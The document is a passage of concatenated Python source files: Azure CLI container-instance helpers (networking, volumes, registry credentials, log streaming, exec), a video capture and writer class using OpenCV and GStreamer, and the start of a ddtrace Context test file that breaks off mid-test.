gitrepo_volume_mount = _create_gitrepo_volume_mount(gitrepo_volume=gitrepo_volume, gitrepo_mount_path=gitrepo_mount_path)
if gitrepo_volume:
volumes.append(gitrepo_volume)
mounts.append(gitrepo_volume_mount)
# Concatenate secure and standard environment variables
if environment_variables and secure_environment_variables:
environment_variables = environment_variables + secure_environment_variables
else:
environment_variables = environment_variables or secure_environment_variables
identity = None
if assign_identity is not None:
identity = _build_identities_info(assign_identity)
# Set up VNET, subnet and network profile if needed
if subnet and not network_profile:
network_profile = _get_vnet_network_profile(cmd, location, resource_group_name, vnet, vnet_address_prefix, subnet, subnet_address_prefix)
cg_network_profile = None
if network_profile:
cg_network_profile = ContainerGroupNetworkProfile(id=network_profile)
cgroup_ip_address = _create_ip_address(ip_address, ports, protocol, dns_name_label, network_profile)
container = Container(name=name,
image=image,
resources=container_resource_requirements,
command=command,
ports=[ContainerPort(
port=p, protocol=protocol) for p in ports] if cgroup_ip_address else None,
environment_variables=environment_variables,
volume_mounts=mounts or None)
cgroup = ContainerGroup(location=location,
identity=identity,
containers=[container],
os_type=os_type,
restart_policy=restart_policy,
ip_address=cgroup_ip_address,
image_registry_credentials=image_registry_credentials,
volumes=volumes or None,
network_profile=cg_network_profile,
diagnostics=diagnostics,
tags=tags)
container_group_client = cf_container_groups(cmd.cli_ctx)
lro = sdk_no_wait(no_wait, container_group_client.create_or_update, resource_group_name,
name, cgroup)
if assign_identity is not None and identity_scope:
from azure.cli.core.commands.arm import assign_identity
cg = container_group_client.get(resource_group_name, name)
assign_identity(cmd.cli_ctx, lambda: cg, lambda cg: cg, identity_role, identity_scope)
return lro
def _build_identities_info(identities):
identities = identities or []
identity_type = ResourceIdentityType.none
if not identities or MSI_LOCAL_ID in identities:
identity_type = ResourceIdentityType.system_assigned
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities and identity_type == ResourceIdentityType.system_assigned:
identity_type = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_type = ResourceIdentityType.user_assigned
identity = ContainerGroupIdentity(type=identity_type)
if external_identities:
identity.user_assigned_identities = {e: {} for e in external_identities}
return identity
def _get_resource(client, resource_group_name, *subresources):
from msrestazure.azure_exceptions import CloudError
try:
resource = client.get(resource_group_name, *subresources)
return resource
except CloudError as ex:
if ex.error.error == "NotFound" or ex.error.error == "ResourceNotFound":
return None
raise
def _get_vnet_network_profile(cmd, location, resource_group_name, vnet, vnet_address_prefix, subnet, subnet_address_prefix):
from azure.cli.core.profiles import ResourceType
from msrestazure.tools import parse_resource_id, is_valid_resource_id
aci_delegation_service_name = "Microsoft.ContainerInstance/containerGroups"
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
aci_delegation = Delegation(
name=aci_delegation_service_name,
service_name=aci_delegation_service_name
)
ncf = cf_network(cmd.cli_ctx)
vnet_name = vnet
subnet_name = subnet
if is_valid_resource_id(subnet):
parsed_subnet_id = parse_resource_id(subnet)
subnet_name = parsed_subnet_id['resource_name']
vnet_name = parsed_subnet_id['name']
resource_group_name = parsed_subnet_id['resource_group']
elif is_valid_resource_id(vnet):
parsed_vnet_id = parse_resource_id(vnet)
vnet_name = parsed_vnet_id['resource_name']
resource_group_name = parsed_vnet_id['resource_group']
default_network_profile_name = "aci-network-profile-{}-{}".format(vnet_name, subnet_name)
subnet = _get_resource(ncf.subnets, resource_group_name, vnet_name, subnet_name)
# For an existing subnet, validate and add delegation if needed
if subnet:
logger.info('Using existing subnet "%s" in resource group "%s"', subnet.name, resource_group_name)
for sal in (subnet.service_association_links or []):
if sal.linked_resource_type != aci_delegation_service_name:
raise CLIError("Can not use subnet with existing service association links other than {}.".format(aci_delegation_service_name))
if not subnet.delegations:
logger.info('Adding ACI delegation to the existing subnet.')
subnet.delegations = [aci_delegation]
subnet = ncf.subnets.create_or_update(resource_group_name, vnet_name, subnet_name, subnet).result()
else:
for delegation in subnet.delegations:
if delegation.service_name != aci_delegation_service_name:
raise CLIError("Can not use subnet with existing delegations other than {}".format(aci_delegation_service_name))
network_profile = _get_resource(ncf.network_profiles, resource_group_name, default_network_profile_name)
if network_profile:
logger.info('Using existing network profile "%s"', default_network_profile_name)
return network_profile.id
# Create new subnet and Vnet if not exists
else:
Subnet, VirtualNetwork, AddressSpace = cmd.get_models('Subnet', 'VirtualNetwork',
'AddressSpace', resource_type=ResourceType.MGMT_NETWORK)
vnet = _get_resource(ncf.virtual_networks, resource_group_name, vnet_name)
if not vnet:
logger.info('Creating new vnet "%s" in resource group "%s"', vnet_name, resource_group_name)
ncf.virtual_networks.create_or_update(resource_group_name,
vnet_name,
VirtualNetwork(name=vnet_name,
location=location,
address_space=AddressSpace(address_prefixes=[vnet_address_prefix])))
subnet = Subnet(
name=subnet_name,
location=location,
address_prefix=subnet_address_prefix,
delegations=[aci_delegation])
logger.info('Creating new subnet "%s" in resource group "%s"', subnet_name, resource_group_name)
subnet = ncf.subnets.create_or_update(resource_group_name, vnet_name, subnet_name, subnet).result()
NetworkProfile, ContainerNetworkInterfaceConfiguration, IPConfigurationProfile = cmd.get_models('NetworkProfile',
'ContainerNetworkInterfaceConfiguration',
'IPConfigurationProfile',
resource_type=ResourceType.MGMT_NETWORK)
# In all cases, create the network profile with aci NIC
network_profile = NetworkProfile(
name=default_network_profile_name,
location=location,
container_network_interface_configurations=[ContainerNetworkInterfaceConfiguration(
name="eth0",
ip_configurations=[IPConfigurationProfile(
name="ipconfigprofile",
subnet=subnet
)]
)]
)
logger.info('Creating network profile "%s" in resource group "%s"', default_network_profile_name, resource_group_name)
network_profile = ncf.network_profiles.create_or_update(resource_group_name, default_network_profile_name, network_profile).result()
return network_profile.id
def _get_diagnostics_from_workspace(cli_ctx, log_analytics_workspace):
from msrestazure.tools import parse_resource_id
log_analytics_workspace_client = cf_log_analytics_workspace(cli_ctx)
log_analytics_workspace_shared_keys_client = cf_log_analytics_workspace_shared_keys(cli_ctx)
for workspace in log_analytics_workspace_client.list():
if log_analytics_workspace in (workspace.name, workspace.customer_id):
keys = log_analytics_workspace_shared_keys_client.get_shared_keys(
parse_resource_id(workspace.id)['resource_group'], workspace.name)
log_analytics = LogAnalytics(
workspace_id=workspace.customer_id, workspace_key=keys.primary_shared_key)
diagnostics = ContainerGroupDiagnostics(
log_analytics=log_analytics)
return (diagnostics, {'oms-resource-link': workspace.id})
return None, {}
def _create_update_from_file(cli_ctx, resource_group_name, name, location, file, no_wait):
resource_client = cf_resource(cli_ctx)
container_group_client = cf_container_groups(cli_ctx)
cg_defintion = None
try:
with open(file, 'r') as f:
cg_defintion = yaml.safe_load(f)
except OSError: # FileNotFoundError introduced in Python 3
raise CLIError("No such file or directory: " + file)
except yaml.YAMLError as e:
raise CLIError("Error while parsing yaml file:\n\n" + str(e))
# Validate names match if both are provided
if name and cg_defintion.get('name', None):
if name != cg_defintion.get('name', None):
raise CLIError("The name parameter and name from yaml definition must match.")
else:
# Validate at least one name is provided
name = name or cg_defintion.get('name', None)
if cg_defintion.get('name', None) is None and not name:
raise CLIError("The name of the container group is required")
cg_defintion['name'] = name
location = location or cg_defintion.get('location', None)
if not location:
location = resource_client.resource_groups.get(resource_group_name).location
cg_defintion['location'] = location
api_version = cg_defintion.get('apiVersion', None) or container_group_client.api_version
return sdk_no_wait(no_wait,
resource_client.resources.create_or_update,
resource_group_name,
"Microsoft.ContainerInstance",
'',
"containerGroups",
name,
api_version,
cg_defintion)
# pylint: disable=inconsistent-return-statements
def _create_resource_requirements(cpu, memory):
"""Create resource requirements. """
if cpu or memory:
container_resource_requests = ResourceRequests(memory_in_gb=memory, cpu=cpu)
return ResourceRequirements(requests=container_resource_requests)
def _create_image_registry_credentials(registry_login_server, registry_username, registry_password, image):
"""Create image registry credentials. """
image_registry_credentials = None
if registry_login_server:
if not registry_username:
raise CLIError('Please specify --registry-username in order to use custom image registry.')
if not registry_password:
try:
registry_password = prompt_pass(msg='Image registry password: ')
except NoTTYException:
raise CLIError('Please specify --registry-password in order to use custom image registry.')
image_registry_credentials = [ImageRegistryCredential(server=registry_login_server,
username=registry_username,
password=registry_password)]
elif ACR_SERVER_DELIMITER in image.split("/")[0]:
if not registry_username:
try:
registry_username = prompt(msg='Image registry username: ')
except NoTTYException:
raise CLIError('Please specify --registry-username in order to use Azure Container Registry.')
if not registry_password:
try:
registry_password = prompt_pass(msg='Image registry password: ')
except NoTTYException:
raise CLIError('Please specify --registry-password in order to use Azure Container Registry.')
acr_server = image.split("/")[0] if image.split("/") else None
if acr_server:
image_registry_credentials = [ImageRegistryCredential(server=acr_server,
username=registry_username,
password=registry_password)]
elif registry_username and registry_password and SERVER_DELIMITER in image.split("/")[0]:
login_server = image.split("/")[0] if image.split("/") else None
if login_server:
image_registry_credentials = [ImageRegistryCredential(server=login_server,
username=registry_username,
password=registry_password)]
else:
raise CLIError('Failed to parse login server from image name; please explicitly specify --registry-server.')
return image_registry_credentials
def _create_azure_file_volume(azure_file_volume_share_name, azure_file_volume_account_name, azure_file_volume_account_key):
"""Create Azure File volume. """
azure_file_volume = None
if azure_file_volume_share_name:
if not azure_file_volume_account_name:
raise CLIError('Please specify --azure-file-volume-account-name in order to use Azure File volume.')
if not azure_file_volume_account_key:
try:
azure_file_volume_account_key = prompt_pass(msg='Azure File storage account key: ')
except NoTTYException:
raise CLIError('Please specify --azure-file-volume-account-key in order to use Azure File volume.')
azure_file_volume = AzureFileVolume(share_name=azure_file_volume_share_name,
storage_account_name=azure_file_volume_account_name,
storage_account_key=azure_file_volume_account_key)
return Volume(name=AZURE_FILE_VOLUME_NAME, azure_file=azure_file_volume) if azure_file_volume else None
def _create_secrets_volume(secrets):
"""Create secrets volume. """
return Volume(name=SECRETS_VOLUME_NAME, secret=secrets) if secrets else None
def _create_gitrepo_volume(gitrepo_url, gitrepo_dir, gitrepo_revision):
"""Create Git Repo volume. """
gitrepo_volume = GitRepoVolume(repository=gitrepo_url, directory=gitrepo_dir, revision=gitrepo_revision)
return Volume(name=GITREPO_VOLUME_NAME, git_repo=gitrepo_volume) if gitrepo_url else None
# pylint: disable=inconsistent-return-statements
def _create_azure_file_volume_mount(azure_file_volume, azure_file_volume_mount_path):
"""Create Azure File volume mount. """
if azure_file_volume_mount_path:
if not azure_file_volume:
raise CLIError('Please specify --azure-file-volume-share-name --azure-file-volume-account-name --azure-file-volume-account-key '
'to enable Azure File volume mount.')
return VolumeMount(name=AZURE_FILE_VOLUME_NAME, mount_path=azure_file_volume_mount_path)
def _create_secrets_volume_mount(secrets_volume, secrets_mount_path):
"""Create secrets volume mount. """
if secrets_volume:
if not secrets_mount_path:
raise CLIError('Please specify --secrets --secrets-mount-path '
'to enable secrets volume mount.')
return VolumeMount(name=SECRETS_VOLUME_NAME, mount_path=secrets_mount_path)
def _create_gitrepo_volume_mount(gitrepo_volume, gitrepo_mount_path):
"""Create Git Repo volume mount. """
if gitrepo_mount_path:
if not gitrepo_volume:
raise CLIError('Please specify --gitrepo-url (--gitrepo-dir --gitrepo-revision) '
'to enable Git Repo volume mount.')
return VolumeMount(name=GITREPO_VOLUME_NAME, mount_path=gitrepo_mount_path)
# pylint: disable=inconsistent-return-statements
def _create_ip_address(ip_address, ports, protocol, dns_name_label, network_profile):
"""Create IP address. """
if (ip_address and ip_address.lower() == 'public') or dns_name_label:
return IpAddress(ports=[Port(protocol=protocol, port=p) for p in ports],
dns_name_label=dns_name_label, type=ContainerGroupIpAddressType.public)
if network_profile:
return IpAddress(ports=[Port(protocol=protocol, port=p) for p in ports],
type=ContainerGroupIpAddressType.private)
# pylint: disable=inconsistent-return-statements
def container_logs(cmd, resource_group_name, name, container_name=None, follow=False):
"""Tail a container instance log. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
# If container name is not present, use the first container.
if container_name is None:
container_name = container_group.containers[0].name
if not follow:
log = container_client.list_logs(resource_group_name, name, container_name)
print(log.content)
else:
_start_streaming(
terminate_condition=_is_container_terminated,
terminate_condition_args=(container_group_client, resource_group_name, name, container_name),
shupdown_grace_period=5,
stream_target=_stream_logs,
stream_args=(container_client, resource_group_name, name, container_name, container_group.restart_policy))
def container_export(cmd, resource_group_name, name, file):
resource_client = cf_resource(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
resource = resource_client.resources.get(resource_group_name,
"Microsoft.ContainerInstance",
'',
"containerGroups",
name,
container_group_client.api_version,
False).__dict__
# Remove unwanted properites
resource['properties'].pop('instanceView', None)
resource.pop('sku', None)
resource.pop('id', None)
resource.pop('plan', None)
resource.pop('kind', None)
resource.pop('managed_by', None)
resource['properties'].pop('provisioningState', None)
# Correctly export the identity
try:
identity = resource['identity'].type
if identity != ResourceIdentityType.none:
resource['identity'] = resource['identity'].__dict__
identity_entry = {'type': resource['identity']['type'].value}
if resource['identity']['user_assigned_identities']:
identity_entry['user_assigned_identities'] = {k: {} for k in resource['identity']['user_assigned_identities']}
resource['identity'] = identity_entry
except (KeyError, AttributeError):
resource.pop('indentity', None)
# Remove container instance views
for i in range(len(resource['properties']['containers'])):
resource['properties']['containers'][i]['properties'].pop('instanceView', None)
# Add the api version
resource['apiVersion'] = container_group_client.api_version
with open(file, 'w+') as f:
yaml.safe_dump(resource, f, default_flow_style=False)
def container_exec(cmd, resource_group_name, name, exec_command, container_name=None, terminal_row_size=20, terminal_col_size=80):
"""Start exec for a container. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
if container_name or container_name is None and len(container_group.containers) == 1:
# If only one container in container group, use that container.
if container_name is None:
container_name = container_group.containers[0].name
terminal_size = ContainerExecRequestTerminalSize(rows=terminal_row_size, cols=terminal_col_size)
execContainerResponse = container_client.execute_command(resource_group_name, name, container_name, exec_command, terminal_size)
if platform.system() is WINDOWS_NAME:
_start_exec_pipe_win(execContainerResponse.web_socket_uri, execContainerResponse.password)
else:
_start_exec_pipe(execContainerResponse.web_socket_uri, execContainerResponse.password)
else:
raise CLIError('--container-name required when container group has more than one container.')
def _start_exec_pipe_win(web_socket_uri, password):
def _on_ws_open(ws):
ws.send(password)
t = threading.Thread(target=_capture_stdin, args=[ws])
t.daemon = True
t.start()
ws = websocket.WebSocketApp(web_socket_uri, on_open=_on_ws_open, on_message=_on_ws_msg)
ws.run_forever()
def _on_ws_msg(ws, msg):
sys.stdout.write(msg)
sys.stdout.flush()
def _capture_stdin(ws):
while True:
if msvcrt.kbhit:
x = msvcrt.getch()
ws.send(x)
def _start_exec_pipe(web_socket_uri, password):
ws = websocket.create_connection(web_socket_uri)
oldtty = termios.tcgetattr(sys.stdin)
old_handler = signal.getsignal(signal.SIGWINCH)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
ws.send(password)
while True:
try:
if not _cycle_exec_pipe(ws):
break
except (select.error, IOError) as e:
if e.args and e.args[0] == errno.EINTR:
pass
else:
raise
except websocket.WebSocketException:
pass
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
signal.signal(signal.SIGWINCH, old_handler)
def _cycle_exec_pipe(ws):
r, _, _ = select.select([ws.sock, sys.stdin], [], [])
if ws.sock in r:
data = ws.recv()
if not data:
return False
sys.stdout.write(data)
sys.stdout.flush()
if sys.stdin in r:
x = sys.stdin.read(1)
if not x:
return True
ws.send(x)
return True
def attach_to_container(cmd, resource_group_name, name, container_name=None):
"""Attach to a container. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
# If container name is not present, use the first container.
if container_name is None:
container_name = container_group.containers[0].name
_start_streaming(
terminate_condition=_is_container_terminated,
terminate_condition_args=(container_group_client, resource_group_name, name, container_name),
shupdown_grace_period=5,
stream_target=_stream_container_events_and_logs,
stream_args=(container_group_client, container_client, resource_group_name, name, container_name))
def _start_streaming(terminate_condition, terminate_condition_args, shupdown_grace_period, stream_target, stream_args):
"""Start streaming for the stream target. """
import colorama
colorama.init()
try:
t = threading.Thread(target=stream_target, args=stream_args)
t.daemon = True
t.start()
while not terminate_condition(*terminate_condition_args) and t.is_alive():
time.sleep(10)
time.sleep(shupdown_grace_period)
finally:
colorama.deinit()
def _stream_logs(client, resource_group_name, name, container_name, restart_policy):
"""Stream logs for a container. """
lastOutputLines = 0
while True:
log = client.list_logs(resource_group_name, name, container_name)
lines = log.content.split('\n')
currentOutputLines = len(lines)
# Should only happen when the container restarts.
if currentOutputLines < lastOutputLines and restart_policy != 'Never':
print("Warning: you're having '--restart-policy={}'; the container '{}' was just restarted; the tail of the current log might be missing. Exiting...".format(restart_policy, container_name))
break
_move_console_cursor_up(lastOutputLines)
print(log.content)
lastOutputLines = currentOutputLines
time.sleep(2)
def _stream_container_events_and_logs(container_group_client, container_client, resource_group_name, name, container_name):
"""Stream container events and logs. """
lastOutputLines = 0
lastContainerState = None
while True:
container_group, container = _find_container(container_group_client, resource_group_name, name, container_name)
container_state = 'Unknown'
if container.instance_view and container.instance_view.current_state and container.instance_view.current_state.state:
container_state = container.instance_view.current_state.state
_move_console_cursor_up(lastOutputLines)
if container_state != lastContainerState:
print("Container '{}' is in state '{}'...".format(container_name, container_state))
currentOutputLines = 0
if container.instance_view and container.instance_view.events:
for event in sorted(container.instance_view.events, key=lambda e: e.last_timestamp):
print('(count: {}) (last timestamp: {}) {}'.format(event.count, event.last_timestamp, event.message))
currentOutputLines += 1
lastOutputLines = currentOutputLines
lastContainerState = container_state
if container_state == 'Running':
print('\nStart streaming logs:')
break
time.sleep(2)
_stream_logs(container_client, resource_group_name, name, container_name, container_group.restart_policy)
def _is_container_terminated(client, resource_group_name, name, container_name):
"""Check if a container should be considered terminated. """
container_group, container = _find_container(client, resource_group_name, name, container_name)
# If a container group is terminated, assume the container is also terminated.
if container_group.instance_view and container_group.instance_view.state:
if container_group.instance_view.state == 'Succeeded' or container_group.instance_view.state == 'Failed':
return True
# If the restart policy is Always, assume the container will be restarted.
if container_group.restart_policy:
if container_group.restart_policy == 'Always':
return False
# Only assume the container is terminated if its state is Terminated.
if container.instance_view and container.instance_view.current_state and container.instance_view.current_state.state == 'Terminated':
return True
return False
def _find_container(client, resource_group_name, name, container_name):
"""Find a container in a container group. """
container_group = client.get(resource_group_name, name)
containers = [c for c in container_group.containers if c.name == container_name]
if len(containers) != 1:
raise CLIError("Found 0 or more than 1 container with name '{}'".format(container_name))
return container_group, containers[0]
def _move_console_cursor_up(lines):
"""Move console cursor up. """
if lines > 0:
# Use stdout.write to support Python 2
sys.stdout.write('\033[{}A\033[K\033[J'.format(lines))
def _gen_guid():
import uuid
return uuid.uuid4()
|
videoio.py
|
from pathlib import Path
from enum import Enum
from collections import deque
from urllib.parse import urlparse
import subprocess
import threading
import logging
import cv2
LOGGER = logging.getLogger(__name__)
WITH_GSTREAMER = False#True
class Protocol(Enum):
IMAGE = 0
VIDEO = 1
CSI = 2
V4L2 = 3
RTSP = 4
HTTP = 5
class VideoIO:
def __init__(self, size, input_uri,
output_uri=None,
resolution=(1920, 1080),
frame_rate=30,
buffer_size=10,
proc_fps=30):
"""Class for video capturing and output saving.
Encoding, decoding, and scaling can be accelerated using the GStreamer backend.
Parameters
----------
size : tuple
Width and height of each frame to output.
input_uri : str
URI to input stream. It could be image sequence (e.g. '%06d.jpg'), video file (e.g. 'file.mp4'),
MIPI CSI camera (e.g. 'csi://0'), USB/V4L2 camera (e.g. '/dev/video0'),
RTSP stream (e.g. 'rtsp://<user>:<password>@<ip>:<port>/<path>'),
or HTTP live stream (e.g. 'http://<user>:<password>@<ip>:<port>/<path>')
output_uri : str, optionals
URI to an output video file.
resolution : tuple, optional
Original resolution of the input source.
Useful to set a certain capture mode of a USB/CSI camera.
frame_rate : int, optional
Frame rate of the input source.
Required if frame rate cannot be deduced, e.g. image sequence and/or RTSP.
Useful to set a certain capture mode of a USB/CSI camera.
buffer_size : int, optional
Number of frames to buffer.
For live sources, a larger buffer drops less frames but increases latency.
proc_fps : int, optional
Estimated processing speed that may limit the capture interval `cap_dt`.
This depends on hardware and processing complexity.
"""
self.size = size
self.input_uri = input_uri
self.output_uri = output_uri
self.resolution = resolution
assert frame_rate > 0
self.frame_rate = frame_rate
assert buffer_size >= 1
self.buffer_size = buffer_size
assert proc_fps > 0
self.proc_fps = proc_fps
self.protocol = self._parse_uri(self.input_uri)
self.is_live = self.protocol != Protocol.IMAGE and self.protocol != Protocol.VIDEO
if WITH_GSTREAMER:
self.source = cv2.VideoCapture(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
else:
self.source = cv2.VideoCapture(self.input_uri)
self.frame_queue = deque([], maxlen=self.buffer_size)
self.cond = threading.Condition()
self.exit_event = threading.Event()
self.cap_thread = threading.Thread(target=self._capture_frames)
ret, frame = self.source.read()
if not ret:
raise RuntimeError('Unable to read video stream')
self.frame_queue.append(frame)
width = self.source.get(cv2.CAP_PROP_FRAME_WIDTH)
height = self.source.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.cap_fps = self.source.get(cv2.CAP_PROP_FPS)
self.do_resize = (width, height) != self.size
if self.cap_fps == 0:
self.cap_fps = self.frame_rate # fallback to config if unknown
LOGGER.info('%dx%d stream @ %d FPS', width, height, self.cap_fps)
if self.output_uri is not None:
Path(self.output_uri).parent.mkdir(parents=True, exist_ok=True)
output_fps = 1 / self.cap_dt
if WITH_GSTREAMER:
self.writer = cv2.VideoWriter(self._gst_write_pipeline(), cv2.CAP_GSTREAMER, 0,
output_fps, self.size, True)
else:
fourcc = cv2.VideoWriter_fourcc(*'avc1')
self.writer = cv2.VideoWriter(self.output_uri, fourcc, output_fps, self.size, True)
@property
def cap_dt(self):
# limit capture interval at processing latency for live sources
return 1 / min(self.cap_fps, self.proc_fps) if self.is_live else 1 / self.cap_fps
def start_capture(self):
"""Start capturing from file or device."""
if not self.source.isOpened():
self.source.open(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
if not self.cap_thread.is_alive():
self.cap_thread.start()
def stop_capture(self):
"""Stop capturing from file or device."""
with self.cond:
self.exit_event.set()
self.cond.notify()
self.frame_queue.clear()
self.cap_thread.join()
def read(self):
"""Reads the next video frame.
Returns
-------
ndarray
Returns None if there are no more frames.
"""
with self.cond:
while len(self.frame_queue) == 0 and not self.exit_event.is_set():
self.cond.wait()
if len(self.frame_queue) == 0 and self.exit_event.is_set():
return None
frame = self.frame_queue.popleft()
self.cond.notify()
if self.do_resize:
frame = cv2.resize(frame, self.size)
return frame
def write(self, frame):
"""Writes the next video frame."""
assert hasattr(self, 'writer')
self.writer.write(frame)
def release(self):
"""Cleans up input and output sources."""
self.stop_capture()
if hasattr(self, 'writer'):
self.writer.release()
self.source.release()
def _gst_cap_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvvidconv' in gst_elements and self.protocol != Protocol.V4L2:
# format conversion for hardware decoder
cvt_pipeline = (
'nvvidconv interpolation-method=5 ! '
'video/x-raw, width=%d, height=%d, format=BGRx !'
'videoconvert ! appsink sync=false'
% self.size
)
else:
cvt_pipeline = (
'videoscale ! '
'video/x-raw, width=%d, height=%d !'
'videoconvert ! appsink sync=false'
% self.size
)
if self.protocol == Protocol.IMAGE:
pipeline = (
'multifilesrc location=%s index=1 caps="image/%s,framerate=%d/1" ! decodebin ! '
% (
self.input_uri,
self._img_format(self.input_uri),
self.frame_rate
)
)
elif self.protocol == Protocol.VIDEO:
pipeline = 'filesrc location=%s ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.CSI:
if 'nvarguscamerasrc' in gst_elements:
pipeline = (
'nvarguscamerasrc sensor_id=%s ! '
'video/x-raw(memory:NVMM), width=%d, height=%d, '
'format=NV12, framerate=%d/1 ! '
% (
self.input_uri[6:],
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer CSI plugin not found')
elif self.protocol == Protocol.V4L2:
if 'v4l2src' in gst_elements:
pipeline = (
'v4l2src device=%s ! '
'video/x-raw, width=%d, height=%d, '
'format=YUY2, framerate=%d/1 ! '
% (
self.input_uri,
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer V4L2 plugin not found')
elif self.protocol == Protocol.RTSP:
pipeline = (
'rtspsrc location=%s latency=0 ! '
'capsfilter caps=application/x-rtp,media=video ! decodebin ! ' % self.input_uri
)
elif self.protocol == Protocol.HTTP:
pipeline = 'souphttpsrc location=%s is-live=true ! decodebin ! ' % self.input_uri
return pipeline + cvt_pipeline
def _gst_write_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
# use hardware encoder if found
if 'omxh264enc' in gst_elements:
h264_encoder = 'omxh264enc preset-level=2'
elif 'x264enc' in gst_elements:
h264_encoder = 'x264enc pass=4'
else:
raise RuntimeError('GStreamer H.264 encoder not found')
pipeline = (
'appsrc ! autovideoconvert ! %s ! qtmux ! filesink location=%s '
% (
h264_encoder,
self.output_uri
)
)
return pipeline
def _capture_frames(self):
while not self.exit_event.is_set():
ret, frame = self.source.read()
with self.cond:
if not ret:
self.exit_event.set()
self.cond.notify()
break
# keep unprocessed frames in the buffer for file
if not self.is_live:
while (len(self.frame_queue) == self.buffer_size and
not self.exit_event.is_set()):
self.cond.wait()
self.frame_queue.append(frame)
self.cond.notify()
@staticmethod
def _parse_uri(uri):
result = urlparse(uri)
if result.scheme == 'csi':
protocol = Protocol.CSI
elif result.scheme == 'rtsp':
protocol = Protocol.RTSP
elif result.scheme == 'http':
protocol = Protocol.HTTP
else:
if '/dev/video' in result.path:
protocol = Protocol.V4L2
elif '%' in result.path:
protocol = Protocol.IMAGE
else:
protocol = Protocol.VIDEO
return protocol
@staticmethod
def _img_format(uri):
img_format = Path(uri).suffix[1:]
return 'jpeg' if img_format == 'jpg' else img_format
|
test_context.py
|
import logging
import threading
import mock
import pytest
from ddtrace.context import Context
from ddtrace.ext.priority import AUTO_KEEP
from ddtrace.ext.priority import AUTO_REJECT
from ddtrace.ext.priority import USER_KEEP
from ddtrace.ext.priority import USER_REJECT
from ddtrace.span import Span
from tests import BaseTestCase
from tests import DummyTracer
@pytest.fixture
def tracer_with_debug_logging():
# All the tracers, dummy or not, shares the same logging object.
tracer = DummyTracer()
level = tracer.log.level
tracer.log.setLevel(logging.DEBUG)
try:
yield tracer
finally:
tracer.log.setLevel(level)
class TestTracingContext(BaseTestCase):
"""
Tests related to the ``Context`` class that hosts the trace for the
current execution flow.
"""
def test_add_span(self):
# it should add multiple spans
ctx = Context()
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
assert 1 == len(ctx._trace)
assert "fake_span" == ctx._trace[0].name
assert ctx == span.context
def test_context_sampled(self):
# a context is sampled if the spans are sampled
ctx = Context()
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
span.finished = True
trace, sampled = ctx.close_span(span)
assert sampled is True
assert ctx.sampling_priority is None
def test_context_priority(self):
# a context is sampled if the spans are sampled
ctx = Context()
for priority in [USER_REJECT, AUTO_REJECT, AUTO_KEEP, USER_KEEP, None, 999]:
ctx.sampling_priority = priority
span = Span(tracer=None, name=("fake_span_%s" % repr(priority)))
ctx.add_span(span)
span.finished = True
# It's "normal" to have sampled be true even when priority sampling is
# set to 0 or -1. It would stay false even even with priority set to 2.
# The only criteria to send (or not) the spans to the agent should be
# this "sampled" attribute, as it's tightly related to the trace weight.
assert priority == ctx.sampling_priority
trace, sampled = ctx.close_span(span)
assert sampled is True, "priority has no impact on sampled status"
def test_current_span(self):
# it should return the current active span
ctx = Context()
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
assert span == ctx.get_current_span()
def test_current_root_span_none(self):
# it should return none when there is no root span
ctx = Context()
assert ctx.get_current_root_span() is None
def test_current_root_span(self):
# it should return the current active root span
ctx = Context()
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
assert span == ctx.get_current_root_span()
def test_close_span(self):
# it should keep track of closed spans, moving
# the current active to its parent
ctx = Context()
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
ctx.close_span(span)
assert ctx.get_current_span() is None
def test_get_trace(self):
# it should return the internal trace structure
# if the context is finished
ctx = Context()
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
span.finished = True
trace, sampled = ctx.close_span(span)
assert [span] == trace
assert sampled is True
# the context should be empty
assert 0 == len(ctx._trace)
assert ctx._current_span is None
def test_finished(self):
# a Context is finished if all spans inside are finished
ctx = Context()
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
ctx.close_span(span)
@mock.patch("logging.Logger.debug")
def test_log_unfinished_spans_disabled(self, log):
# the trace finished status logging is disabled
tracer = DummyTracer()
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name="root")
child_1 = Span(tracer=tracer, name="child_1", trace_id=root.trace_id, parent_id=root.span_id)
child_2 = Span(tracer=tracer, name="child_2", trace_id=root.trace_id, parent_id=root.span_id)
child_1._parent = root
child_2._parent = root
ctx.add_span(root)
ctx.add_span(child_1)
ctx.add_span(child_2)
# close only the parent
root.finish()
# the logger has never been invoked to print unfinished spans
for call, _ in log.call_args_list:
msg = call[0]
assert "the trace has %d unfinished spans" not in msg
@mock.patch("logging.Logger.debug")
def test_log_unfinished_spans_when_ok(self, log):
# if the unfinished spans logging is enabled but the trace is finished, don't log anything
tracer = DummyTracer()
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name="root")
child = Span(tracer=tracer, name="child_1", trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
ctx.add_span(root)
ctx.add_span(child)
# close the trace
child.finish()
root.finish()
# the logger has never been invoked to print unfinished spans
for call, _ in log.call_args_list:
msg = call[0]
